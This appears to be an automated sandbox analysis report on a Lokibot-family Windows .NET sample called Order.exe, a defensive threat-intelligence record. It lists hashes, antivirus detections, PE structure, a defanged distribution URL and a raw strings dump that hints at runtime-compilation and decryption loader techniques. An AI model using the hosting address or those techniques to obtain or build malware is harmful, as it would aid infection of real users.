MalScore
100/100
MalFamily
Lokibot

Order.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 35/64 Related 2159
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 305.00 KB (312320 bytes)
Compile time: 2018-06-27 21:56:31
MD5: 95fb4a270199cee40a137e6d35067a84
SHA1: 276a7c67da46edf1f932a41c3a68aa143398cabd
SHA256: 095efa41f0f29ac0025f691887a99a6a7d68b272604165814f978075f90dbc2e
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2018-06-30 17:00:03
Last submission: 2018-06-30 17:00:03
Filename detected: - Order.exe (1)
URL file hosting
hXXp://abatii.web.id/smart/Order.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-06-29 18:07:56 [35/64] VirusTotal
PE Sections 3 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x25244 152576 b5fd2afe3ea10102a1892404599c989b 07628f8c751947ca8e205a24ad6c9d95dd7f4ea0
.rsrc 0x28000 0x26af0 158720 6a5ca7d55e728cbf2b28c03eaf999adc c5cde335c8738e04a55b95c28aa459e9bb9c9a62
.reloc 0x50000 0xc 512 9bbf5aa8289858b6eff4c835ebaece62 513b15d18b5468595c7327e8edcb954a409d4e86
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0x2c3d0 16936 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x305f8 20 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION 0x3060c 524 LANG_ENGLISH SUBLANG_ENGLISH_US
RT_HTML 0x30818 123113 LANG_GERMAN SUBLANG_GERMAN
RT_MANIFEST 0x4e904 490 LANG_NEUTRAL SUBLANG_NEUTRAL
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright: 17qIfHgP
InternalName: EEXBwVS5
FileDescription: EXva7wnp
Translation: 0x0409 0x04b0
OriginalFilename: px4ras6p.exe
ProductName: 6LZWsfbN
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
FIle type: Library
mscoree.dll
IP Found
No IP detected
URL(s)
file:///
String too long
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
EXva7wnp
VarFileInfo
FileDescription
{11111-22222-20001-00001}
Location
$this.TrayHeight
{11111-22222-50001-00000}
GetDelegateForFunctionPointer
{11111-22222-30001-00001}
17qIfHgP
{11111-22222-40001-00002}
$this.DrawGrid
px4ras6p.exe
StringFileInfo
Translation
3y0LwkxXm9oSCsx74m.18veulde2xReYOYqo3
ProductName
System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
InternalName
{11111-22222-20001-00002}
VS_VERSION_INFO
040904b0
file:///
$this.GridSize
$this.Locked
{11111-22222-30001-00002}
$this.Localizable
{11111-22222-50001-00001}
OriginalFilename
$this.Icon
LegalCopyright
{11111-22222-50001-00002}
$this.SnapToGrid
{11111-22222-40001-00001}
System.Security.Cryptography.AesCryptoServiceProvider
$this.TrayLargeIcon
{11111-22222-10009-11112}
EEXBwVS5
progressBar1.Locked
6LZWsfbN
$this.Language
progressBar1.Modifiers
w?"Zn
gcKG6yOkcCCUGW3qqXj
"spl
.OQhv`
>eJI
-\q)
Mt3
smethod_13
smethod_10
smethod_11
smethod_16
smethod_17
smethod_14
smethod_15
stMA
D{
_'K
Int32
d"Pq
%h0\
u ol
&yi1
ObjectHandle
&uq]e
O&/
lc60QaOLwsPgrKPXNAS
textInfo
TargetFrameworkAttribute
b+MD
w~D?
ICryptoTransform
get_AllowOnlyFipsAlgorithms
x@m2
P[?4
!eqf
_ p.!
*4{f
A=5/
TnP9pdpCqO4w5jCtC1
|\O2
<I{Er
Aa1W
1\Rrt V
GClass0
PB>F @
sx|P
Z.~>
smethod_12
-70B
J1bn
m@]8N
b~-e7
- GK<L
O~!Yw[
h:y>
J\>}M
8" N
{9eJXd/X
U-gb#
AOw|
1%=r
?k6O
gcKR
J%Gw
Td<zN{
oH8rh
d,~i
N6mhDLs6UdpxmY0tk1B
K>N#
TDEIp
'RY#
*t{qz
v$"x
ekDkLYfUtaZayGhyWWv
b){h
smethod_0
smethod_1
smethod_2
smethod_3
smethod_4
smethod_5
~ tp
smethod_7
smethod_8
smethod_9
) \ O!
_Q)|
*8GG
RfMnpP
Tfp@U
d ^Y
?KyE<&
`FwO
k%#_
PNG
'2!h
2K08
w!~%
_;y] a
Ceiling
4{/D
B\Qf{
Y';h
%yz;
![+6#
]rt
Marshal
$!k>
DateTimeOffset
"PQ#
&+`
compilerParameters_0
0L:<
^1a
Mwzv
UidX
sS%F
'|VV
fieldInfo_0
SortedList
AssemblyDelaySignAttribute
<dae<
[twr
Replace
r$"X
Y Q
+1?~
xx[
G\FY
[]R1
V-[J
X4n87
u[aQ
uQw/
coh~
# x;
Y D
N-Bs?
$R|
WRGATEshx1xE7883OSG
;.<G
;+9@
QZTUNefK37bFYfIgNMm
28C66gEdfyuxjXKM.g.resources
$8(_
#'w{
+0
r=_5
Y |
MU&!
HL+B
t?'Gp
Uc>I
Y f
EndInvoke
]WgF
tw~B
bavraqsFaB26Vg21Fwg
bAn+
tG9<
U$ ^Lg7
_b`*b~
ci7+
FileMode
OpenAsyncRetry
xsI]
_)N8DY,
stringCollection_0
@E2Ue6
Hps=
({#c
>"-1
3L<Q
qXF,
(6PJs`My
Z.7!
Write
;X?j
Y 6
aMpBF4sXgYBbPuPyUjw
qgh@YhwJ?x
y`G
KceC
currencyDecimalSeparator
eoH-
5l2q
A JS
n/y0
<ej
1#M
6D$q&
f;5
OGE_
j`U\h
sM=x
X323k'}
AssemblyCompanyAttribute
l7&vbdF
$f R
"}q/
]=$F
]4H)
LpSL
-D|
YJNGs
(7x"
Gl\8
x]t*
j_6%
*|g"
|)c9
!1-i=
3jjw,
FLXD
@lR
C!^.6
m_useUserOverride m_win32LangID
[V7/
;F
h\{s
iFONMVsQZJnc5u77KHQ
u dD
w|=RK]
cM7
4e=y
Gg[#
zRqiOK5RlxxgIxTVgW
E V_
QO61pKIfpZkVKr95Om
P{"A
Mf4,
Pd t
fiVr
0O{#
[g \Q
iLpD6osLF09EGAkL80R
Exists
System.Security.Cryptography
Au4
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
^Vjh$
f]>5
K^+-
PADPADP
O5e'J
0iN
#uw>
s eO
y}7/q[
x 1X9J
7w/w
@43p
Gw"s
/QcS[
sortedList_0
4}Ev
~U, Z@
eK
WP&J
+ yB
C~3j
jlj
h) bU
\^&a
Pt:
]<FI|.
qf]
FromBase64String
zd53tgsd3qhZlBUqt60
?8A
6 VO
>] od
|9C7
fqOv
AssemblyTrademarkAttribute
L_\a
deWbiAsefpJp3awqORw
m_listSeparator m_isReadOnly m_cultureName
?Dnc
pJz2
~c&
lHnv
%xd
h!yf
S,S
Faw9
%s:4
B46{
=o1|
dy[lZw
#0'92
w?q`+s
{87yK2t
JofnRfcMxWTJ1hHSMS
rF>|
ZA<$
(CNw
k8O>
O7ShAGf4fJYhWwdfDS1
04}a:x
[%&0A
_1]:
@&2'
1bDp|
Wfp)
amVC
B]a>
kHyJUNq2fkaUnpjXXJ
EB[P$2
I}p/
eSkS@
uR"NdC
pFnF
2Km9
/zgv
PZ 6
BD`I
t<V&
jxl
keHw6CsNOf2pYGNnxTS
x14R9xoN8GdTLKhuZ1
Y%o&
#@@e)
7}'qvJv
v% B
~&_
ciT[
(Lo9
B ]|
kJo
`M!p(
-9 y
j #y
X{X
L).4n
, I
Co
N.4Q
-fxR
e=] '
binaryReader_0
.yT,$
_o~K
G.Tg
qYqk
B3pG
qkQFIa
Him D
eM^~
E[PS
^JvB
KzY8D?
4r>|
LuIq
TmR]
BRg
GetValueOrDefault
7g?D-
"x<_
h/oP
A_pGo
OJOG
MZ[=
YR.\
numberNegativePattern
p" d`Kg
Z-P,
!Ij|
a|0F
znO64jF1LIshg8d9yU
'7t
!67<dR
@T2UZy
CreateDelegate
_l~S
)f]x&
3W v
jTXG~G~
;!+EtE
An@A
IDATx^
z?/I0
Z}V
"Kla
29w
/N.73J
F3G@
-QhP
mK'&
5!Ov
5:Dk
Padding
KP6&k
s;F
as|[
e
guy.[
0!l
X $4
ResolveType
H#x>A`
/}dLy
nQYb8TOwGe1CtJlET2j
__
k<&g
pr_;
{wC
z2pArYfZMNKZOBeax4X
Ep<#
CU~j#
uQsBh7fL4Miu6TBiwl4
.ZzD
zx)d
;A*/"
=6qvZN
d' y
9_X"
+LSs
Da/P
C:bH
_qbF
Ondr
nElOCYYvEFx1LDVj6h
N E
JS-)X
d<q~
System.IO
Av?klb
2CMW
[c8N*
gRDWO5{
c #
"[kGlr
!/jnLK
cM)V
''5]
,iqw
~p^P
6Yk9u
9<27
EDf
R i
;6vw
1STb
.text
!N`1
qvNtRLMvKN8MkOkxQq
ce4DmfsmSrOT856tDgfrkMb
GetString
.I6R
i(ZC
YC ,
jK"@:>'B@
XZ/UJE
?2 8
N|b\
CryptoStream
SsxH
Pw ,
Convert
16?? c
=0^r
q#|6
positiveInfinitySymbol
'``OPT5w%
object
RwoL
percentGroupSeparator percentSymbol
1)8[>I
FlushFinalBlock
numInfo dateTimeInfo
<TK/[
3}XYYQ
iJ1LkLfyJdj7Sv5X4m2
&+8E
q ih
>( o
LL2$$
ObjRefNMLVKEYDOWN
fe+.
iiC8
H6DJ
ZJL0Yw
P+,X
3mz[
Xo W
<B4i
:le4b
V wb
ToBase64String
lP_ak
$$method0x600005f-1
$$method0x6000020-1
TxpahOvcBPGE
r3D:
n Uy
zk=Mj4
FKOL
7{/R.XF
encoding_0
ZllP
{3l@}
P,1:
u9'
jUc6
WriteHeadersCallbackState
)Z{[
X Au=
aoeD7Bfux4PoyNsb1H1
X)RouX
dLg0
$Z'k
CP;dq
CipherMode
RI|A
.TY'
76 A I
SR]L
$=9
System.Globalization.CompareInfo
cbE.{C
yfy-
; 0}
Lm&
WO@%
mw#!
l Z!ZgU
6x,\
XRc<
_@V2
wbPpHeGM0fiB2K2N9S
E%n?
hS?6f~cm
smethod_6
[7<gd
H' S
S@#
PAtx
3<<w
RuntimeTypeHandle
@"w{
I*V0{6
IwzQucQzApjy
ejpwTWsBAqQuqeREXDu
8xWa
Ft$W
9jq8UD^
<r'O
(C a
B|:o
$\j2
SRi{1
l!!.jE8
System.Globalization.Calendar
long_2
L%u/.G0
K\E6
UcBXRmsHgE16cMuRKli
vs%-.
X.kh
=v7\
,'n
96~)T
`.rsrc
=#(1O
<Hn(F N
T"[v
&%Mn
/V=u
,4I9
x: L
?\O p~X
$|\*
IEm_
WJY
L]vS
IconData
*2(g
8.vhL
">=~6
*1gB
result
Y]4p
XI0 H%
jib
MQ<Z
b}(5
>ht=o
Q [B<
8/Q aw
pHYs
LMoF
7uqCf.n
e!9LnI-
*2(E
.ctor
vU/r
$'}IL#;
get_CodeBase
1Jw^
vlA^h
; OBmA
NativeOverlapped
;5x"
&iJ.P?
W ~
ktlInMsoyv74GVcwlEN
a)Nw
eZ<)
UM\)%
\0p W
(F5
}z$^K
K"H+q
SYD
{wtA/r
OI5_
#dn #
*2(4
j3IPDnKGZUwYGhm5hM
zJxD6
Q48a
~cQc
'>1po
Hp,_
G1z*
,18$[
PZ t
n}&J|
DJLo
<z+r
X/${D<jq
/4p c[
caEchBbgXo
]j,!)
L!#Np
9p*q
XqA|ZT
G,+fv
}d[*
SqlUnicodeDecoder
Km ^
height
Zlde<
9*9;
UPIx
G2EG
9Kp"
DdGsevfijafPqvNuuVJ
Q8Vy
71qz
1y}W
delegate1_0
delegate1_1
StringCollection
U5 ` =S
w3l/
[; y
culture m_SortVersion
H$-I
7S)T
XsMZ
[Og+;f
-W7x
na.Kt
M|D-E
/T`2
-R_\
62UW
: gc
=lzD
(+A&.
x.r
?& D
q9oR
y;LG
mY_[5
W8@)
Z GW
+J(J
vm $9^w
OZ3iLrf724TTas8yif2
GetBytes
w8XI =hd\
+Jqnz
Gz;`|H
Gkl9psfRAS8lBGRPXeZ
OSyU:
Vd}=>
;!t#8
UKNS86fBpK9yhwbjLwg
3vZA=
TI7K
Enum0
2)?
~pjjY
0mzc
Lo( E
VcY,
& =
VA2:H
*2(j
Zp!r
wcvdGjfQ6sRkBY4FGR5
7tc&
c>vN
*2(u
!*W2^
'vZ$
.:4r
}2U%
F\b)m
c+4r
lSYV
nativeSizeOfCode
get_Assembly
*2(L
-x1N
DynamicBindingFailedException
-Os
-MHN
O0e59YsbNFUbt0PgJ1P
OffsetAndRule
u"_I
()R/W
w]J
,NsU;#@
/d8t
- sI
*2(\
*2(]
$;K"O%R
33$
`>ti!Hv
?Kn/
!z1)
@wcq{
9Rge
*2('
mscoree.dll
Y1C
_:Cm
uN%
TImF9S
uHAG
RmVvpCsTOhuupUfyQ4G
LAdtMnsuN99sc06xBTw
gWOWJy
L _?
7ZiW]
|[*)J
ox"/
g$~D 4
v6#Ro^
*2(?
System.Reflection
_u}Ns
sE{r
^v=u
yN*3W
f !DNa
\R\>P:!0
*2(
M$Q
WrapNonExceptionThrows
JbDIGGli
AbMAVR
&|}&Er
nD4,
0GB"
System.Globalization.TextInfo%System.Globalization.NumberFormatInfo'System.Globalization.DateTimeFormatInfo
numberDecimalDigits
C z-
H5SQ
4"N
MQ [r
?z[
J(ja
e*(vL
^o~bD
SNp%<8bD
Console
vn=bx
QkB#N
vaS8YJ4sDEsJW8Har3
DM-E
!\V
=6'y
;]&6v
U5UlTDfhRXOoAqoYocG
eXwkTSJ8HIIbCBYA0D
KY/
@dF`
nF2]
Yu+5
E"c+
w_T
!KE#{
YE+c
KhFVHSfvNV8pr88MqQo
EKEi>
BUCD3
Y&u `
s%:l
wRRB06lph0tYZD3njN
|T+BU

N,W(^'NG
Vu#*
jM~(X
} S?
em0g
int_4
_-b
mMFK|E
$e$p
)"TH1
a~%,f
`%gy
IHDR
System.Runtime.Versioning
SjDk
method_8
bLI~
Mf&-En
QTmU:}c
i0_30{>sh
#J \+^
W8`13
6N[P[`
@v<0
-R&
<nnd
0 0
FU8p
O`" 7
LNy3DQf2wk2AYc79iD5
h[)=
PUGF
qoU^M
MH`qg
w; k
%EK
3iYp
td$)
System
I4n=
f};S
zu"K
L@$v
{x,y
.M U
System.Drawing.Icon
isno7jfFr0myBh5DHj9
Q1Bj
pJo>6
=:nkrH
N97qDdO6F13yGARwlRA
lZR7
eUa&I
kw!=
=*\f9h1
(hNI
sD6_
qJZTe2O5gP3gHq5VE9G
&Nn6
2=\.
W: ]e
6lw,
eaaXDH7H9BnnaxnXSx
v$GF
uzvA:h
7Ku~
Class8`1
IqunGpOgbRQItF4fu8f
CreateInstance
S@y>
KFN55hfTWCrisPMpCNI
$$method0x6000039-1
K.q
XU 3
nh2,
#0)U
`?of Z
G:8B
z_XWh
8h$}/
4xeB
MethodBase
&QS-S
{avw
System.Collections
s] <
DfRk
Dh3
YFH9
1nj;
set_UseMachineKeyStore
tZuX
McJn
ToolIMapViewToIReadOnlyDictionaryAdapter
w(-&
B1==
FunU
LcPI
9?Q@
9wQ[@ZUT
f)I[
/ + &+
nn,U
memoryStream_0
:A@6
!aN l
Tn)J
G]Fc#F
Sh
y#p~L
currencyPositivePattern
?YFe
/$$x
TPMGxx5Tn3growtOSH
2eKV
UjoQ
digitSubstitution isReadOnly
DEEt
K^ '
CP\D)
X 8
3 m M
X 1
O2mD3Oayfk0f8Zesr2
dpUG
}p'E
cRD:
X A
X C
?a S
ysT_
_$flu
M`uq
X ^
f5oq6wsgWoML3gRp8lY
G#p(
o`'YWi
string_0
Ws?v
q`fY
4SA!
W*a{
z|z2a
System.Diagnostics
X `
GetType
bGkU92
A?D;
7FS?F
3*3
0N17
XT*F
X r
o=oE
19 f
hNLn0XOBH6bv4H2CGJH
7(3.
!<ub
fM)1
Microsoft.CSharp
#@gD$
t^\0TVG
Delegate0
&t27%-v
,9I
Activator
'N0]
8#fJ
?R!\
bs:26!;
WaitHandleExtensions
vKN;
"NV&
p=Mp
uWPQnOO9DN7RMN8KqAS
x+Oz
>I @
_Wd)v
ge+]
^p6i$
#0gGQ}
adS
q``D?
?JCURK
Jm$
(?i!%
v$!!
d2GI
mUSi
%>F+
?i9
Double
|!Fd
Uh+4L$
t |B
]+5E/dl
T$ Z`|
"NU]&k
n'@G
CompilerResults
}%V~
yk:Wu
String
:3xi
BLeT
X$),
)"
"5o( yN
7Lmn
yv=P
JJ-%
<%ZM
1{')
@U *
MD5CryptoServiceProvider
TY_6C
XH0\W
~_MU
4klf
get_BaseStream
v/*UrDA
qyiZ
(_$w
?@WV#
V\I^v
aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources
3H ^d
4gGo
<DW[
Mo4K
Zw>t
get_UTF8
TNdA
Y'GY
;?L`
}Ywk
,N!T
Q5G'
L#1^I
4W+`^
kD9oaw
3s0M
PY38
*2(
TyTMsGfAJqMDRrp2kR3
#n#!
8+=t
5.6a6?
aLqT13OCEw4mTtut2kj
gPPZ
w1%=
P+Class7+Attribute0+Class8`1[System.Object][]
dgiHWAsfigXUlhBQtwd
_w[t
+'nvm-
AssemblyKeyNameAttribute
0')!
}9x E
7KMR
ISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
S-Rrk
!v C
\pF(
g *Y W
$&~<
{U(#Od
get_ManifestModule
[2gU
oc}+3
yuOty
9z"lLqZtw
OperationCanceledException
Y&xY
:k1_
:#>+
'I@~
$J2
,m!m
|L^&
2>_X
y !z
8zWv(
1 \nj
&cKq>
B\oV
! e-
BitConverter
~tf7D
Y3\b
3\P{]
:sNO
[o5j
Je\K
Y]rRJ
TYqMW
%-MK
h,HB)TL*^
eEOO
. 9]H
n18hWrOjaiWssGDDZMF
XrcLd
A(*'
\oVR
BVl; b
wVuh
tx@G
U!>
#?~YdVJ
NMTOOLBAR
System.Core
3 |>~
yYX $
P0JX
e#cF]
/~H?
9J.@y
tfDp
;6xU8
/l@
VM\Y
DMOt
Delegate
yfY)
AssemblyName
]<7}
6!g[W
y83<
mnqK
|$2+
o|~.
uz=Md
DD=V
System.CodeDom.MemberAttributes
[jk9
( -f
3T%7
XWgdJaOnh01q1vbx0Tm
'o$rZ
8@#5<
zGp~Y
*tN 7
D5h8Q
;;HO
jP_q
,/E
n\^D;
[)&@
pR>:
nni$
UpbjsKBej7wmARQT64
[.Zz'
dvx<
eP:1
zPO<
>k&+H3b
Enum
ah<mz]_P
5\yZu
i~|RT
mM[z
AH5XQjsKCNxu90DOHxw
=2b]
xR^c
~3u[W_f
#Strings
ByteArrayHeaderParser
|IcJZ
assemblyName_0
InstanceDataCollection
qc\}]Z
jmghb3HutEem003uxM
UltN631SKVObMYlYUX
p5ZOR
pYKBGJOVHSmwJuCKhTQ
[L?fh
!tM~
G@/>
D;a
eU!=
1>fi
1i#5
~;(c;
K"7/`
ZSf
&X
Mn@
get_Length
perMilleSymbol nativeDigits m_dataItem
D0/2
6$\-v
Y{V>
x yQ
m_name
jmyuz=F0Kf
jL:.
H )
9|vm
>1i51
\hqJZ
wx<4,
N4RZa2saC5yP6yV6F1V
6 U7
S>v"
__AL0
aRPO37eSm0E0M61gWv
' s
<-3(
9aV`
^I.o3
!N 9
ib5 +|
! :3R
1+,F
TwoPaths
J$b8
-=rI
$O?Z
lVBE
CompileAssemblyFromSource
-=rr
wxR}=b
F+ >epx
,LzE
O_td+
f_`X
4pL6
System.CodeDom.Compiler
L-rP
`7{N
c)@ ,
6OU
7P
ABq',
4grAB
%>Q*
!V/wad2
+ #H
zI|^
>KOS
kO,
+SI ehU
fPufT7OFSta1njHcf4D
c)|^u
9kS
Of4ypQOPaQhCr3XCJHk
/ -~
Ay2hQdsjOg3Ci3NABix
"zl
znmFI
tr%hu
Trim
nUdZlGgsMJXHWpfSp9
rZ6uu4O3ievEbXH0r5O
validForParseAsCurrency
8(on
oa^+FU
|(6 m
Format
:I`X]
~!(@
NeeKLLfqZVuVUHSLxWD
Lz(Mf
p7RBULf0nt5LyQvcvmq
.vs/
{eS'M
^!* .
MB))
x{EM
[N}&
krdGbROJ7xeoKAX48nG
b-R\
$ LI
%b\?
dIGq
nNNX
"{%TP
:(LC
M$9+ ?
J+T!
%)'@
jb M
ge!W
,Z`o"Vy
YsH8o
gwasY
wt:n
Y]#fb
Nm 4
#?yY
*JAc
wE*+
m9P7Y2sOPS7mO1QiPOm
|p+FNp
RQfF#h
[5G
$Y"&N
C@`
\:il}
UInt32
ToInt32
YJ{l
%`B
?qE4G\O
t,]HcE
assembly_1
'] $$
_JHm>v
&N>"
-]]/
0*%6
ToString
EEuq
stream_0
~1g6
-;W=
.!Lu~s%
ejnC
>rdU
oI#o
h'>(!
vVIS

array_0
za4;
QG+<
A=_$M
n~/I
2_Ja'H
mUP]v
_n:m
o_ku"
Y7yg
!u<8
Hvvx
r$?gF
W [[
o!Pw
9tw*
O6FTe
&(uXg
_b(U
n{/Ro
AIUBbpVP7tDacuL7mh
X<c#
?J
E~}{L
Xpy5iqTZmAyBwATkg3
C\A@ Q
currencyGroupSeparator
U*1/+
U-;
%!N
C2@p
]*a/
c T)1
h\09,
WS$+
pmxBmus;?Q[
zSMwjb0k1MBVM6tbZA
z(>z
iIob=O
Y<?e&N
N`GBh<*
c6{
3_;*5
#i'5
Tvd,
args
AssemblyTitleAttribute
_ 0@
xQz#
13 g
<PrivateImplementationDetails>{7CD7B5E3-4B66-430B-9BA6-4BD8CD24CA77}
&+E&+R
F_{u
XBJ0bQs7m4ghy6qHrxf
ta17
.|1 q
h\R<2
h0?uAw
<Qt|
X mo
qZj|
Zd)1u
_m1H(
gLsaN
[}_}
g{F2
?"$\
8<~5
G<&VU|
X+tH%W
a$wX
i$ic
] -
?Bra
wqYJ?
MemberInfo
%|Wt:
>-y2Q
+\eS
o\;)
r*Vk
hGl=
1`I:\Ia
Ij S
#"lN
fX"@
G)dc
wTvs
_7H|
m'w6
<*%$
set_CompilerOptions
MxAwuV
tfhRggfoDl6QAW1erYX
0N-,8
width
,xr<
|_l@{
CMN4=
ushort_0
(B],
d}2u
d|.C}
$k0
K8
!d 9/
r+~%
D}(HCw0A6
4g7V
Jv)3F
>YI
D8%b
[lOzK
Ksbj
v+{G
~)=]
currencySymbol
numberGroupSizes
SW?G
WBXeMuQM4v5Cu4moQI
/he8
get_EntryPoint
x4nx6ifrGHUSNPDqfjv
dz K
-R&+B
lY>U
numberDecimalSeparator
.[bZ
E9}7
<Uh
3T$}
k:Ae
nV#=z;2
np9#I
+ke% %
6ABowH
Zo]\M
jG_&
T)Cp
o1AG
v.<U!g
Glz3
:!Q^>
YI c
K5Gp5ys8vJyf4sb513c
e#wr
[<^_
m%kq
Z/O
.+SB
eJ`1
6O 0+p
Main
"!;?
L5am
KDRJ6Jff49gCVFTmBpM
D% w
iA M
Invoke
_Q (R
#URo:
{]S(
}jnC
Z"/ujxf
method_2
method_3
method_0
method_1
| 9"m-
method_7
method_4
method_5
gwdng
NY X
LWbJ
RYC^y
v4.0.30319
=|oT:
*s|S
[;zd
/}D[
&]ZU\W
$MURN
.)K=v "
_ A*O
OK!lA
A# C
nUfQ
9svo
v 1 uY&
m@>/
Delegate2
L8YN
Module
Delegate1
>g\);G
/D`h(*=
qCM!r
Array
R=0]
y%/5
A{2
_Qh]o
3COBD
LgLH
intptr_2
intptr_3
intptr_0
intptr_1
h?VE
IListWrapper
-&+$#H
@.reloc
%)g~2L
wO?hT
:IT6
` To
LI81"
`z`Z
<B +
>Y5NW
rOH0DQfp9l3JSN4U2OE
UV4
M@dS
rmZJrUsmLT6RUC3Lh9P
0960,5<&
/VT9
5^ @
j4b_
&+:&+A
x-Ms
vGNvL
E(X
'XN'
^(dk
Byte
Y!BK
A::
/L #
U8Z
$KUd
*,K2
CryptoStreamMode
I6go
currencyNegativePattern
w3W2
o.W5
2N@Vb
Oj8|:
-($A$
@#nWR
get_MetadataToken
k v:6
{wvHO
.q^Q
C{+n
k| :
SoV!1
p,[
OR9m
*XT^g
yM8}
enP
Y_,*$
Ya&z
vy O
Vz$)W
8wu
F+t!
28C66gEdfyuxjXKM
zguF
gf[fz
Flz~>
lfk`
I6;g
PtSmi6R
h.[6
compilerResults_0
txQc
@wf*}
_xz)
' 3}C
nP".
Y`QzC
:\Ri"
"@.q{K
9pu=,-w
numberGroupSeparator
;n h7
u$@r
ArU"q
}t;:
get_Location
_D9>
o%*82#
`Jg 5
(?Z7
E>.k/FT
!{O&
(}9YQ\
RegexFC
bT8W@~
X#yl
LsyT'
,_/W
1 z<oL|
sW2J
I%8#
comp
l"j_b
eWg{
p5CT
}_UY
c{{}
FrameworkDisplayName
&)2
[[pL y
k;'5
@k `.
tZ4:3
ca7qfqWQ41KZQVNGsr
BtL{
,zP
&ve
kV`O4O
UNICODE_STRING
get_CompiledAssembly
QOdxPgEqcdSfA0iPf2
FZ1Pz
j3 +S
m {I
-Ch,
(Z-#
eI?$
HQ6
#]i 1
M\ '
\
zOp_'
RuntimeCompatibilityAttribute
`E7hGp
exQN6aBzqUE34
>A?w
v+Kl
Buicm~J9g
vtRPQisPowUXMNlTe0l
SnC
Assembly
fXm;
Truncate
<j.k
9f^1"
U,e
K+x6xK
%;R r
h(]Y'.
R eY
PG4grWylbCvuBI7Vs4
W u/
`6NAFz
tqe+
System.Drawing.Size
WL`8
)! _
b5KS[
B|JUM
. M !
1p$;
H\OP
dX(
jMY%
Lf.6?]
xl8H7MfdRX4oKOEY1Ab
WoS%
LUi94IsvpJS7qDDUC6d
FM9m4HsIXSpyxCEpBk5
'h0.*
KF=v1::H
q* x
*=dmK
nC]d
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
C;"N1f
pXS8FFRgIZaYu7uAVn
set_GenerateExecutable
Hr[pPb1
-=&
iPod
w<dv
6[Nk
4P=<`
:? h
%$5?P
`Rq4
3E]X
% a"M
A9iJR
a0Bog8s0f3PMQ82lg5A
FX#YM
tcX%
vP c
/=A[k
3 OK
)Pm2
+G#H
9 dh
gE^L
Class7
FM4S4MfIV7UGTU2L2uL
AvX6
lA7K0HjQw5WkMWrcIo
I!+f
`iET@
:Z-8t
6t&]
.JWKX
bZB 7
~,giOh
m_name win32LCID
$vlmX
d&je
rx3
qD T
K mBq
)QZm
"Z#yu
1!G>
bMlJiJOYNADSUOax5B2
, & `
!j'}
NtJGo
PJK;
lXEXXlO07tAgVHMm92P
OpenExistingResult
,A|E
<{}(
\Q.]
q2~
@]zxY
#CC,#r
&++E
ew\^
WJPQD6ssZ3Ab7doErkD
Z$%>
D,A
m\INie
< )55
YP~WltE#
|@MD
sThnt
dF2Y
44 g
2+H\k?
yoQ
RuntimeFieldHandle
Wb@6k
P=p(6
uw[g.
!#+5[
2'ji
gK'V
yVGQ[%W
{"xE
yfkM
>/ J
?]Y|
Vk^4N
YLc1
IZP$
hashtable_0
^)PpvL
Amnu
IWZA*
3P\E}]s<
fkmS
r 1f
v|D1Vd
R=~7-W
1`\"
p`
hgmhhTA6Y04CrhNqwT
kxxp7.
W(-T
,Q&
FileStream
$R&f
#Blob
P:q&
StringBuilder
kDYhbWi2TeWFSDhRtZ
- &(!
,gz
5;G@
\EYSJ
KZQm
nQk!
Em^
3Sy+R
vZ,X
Uq~0]|
Ps^~m
get_ReferencedAssemblies
<So7
b]>5
s732
7<l0
v5*]D]a
(g[6
o2h!=D
.T\c2
#HS}
I3{"
t kA![
EVEBI
ListChunk`1
34JU
dYhYCfftgPF8Kg8iPWR
`%`6?H8
$ [Q%'
#&6
XmZ\
|q$
B\jb
O"zD
\t&z0
codeDomProvider_0
oLRHuW4ylfH2hQm2by
m_useUserOverride m_isInvariant
TjAQ
h%$@
fvuO8kfN3uxQ2cAQ2Tm
Q7G4AisZF6h4VmXj7Jm
A'D
j@SK{a
5{ uB
)ll.7u
-@ >
yO/y
L2F}
HM8@<y
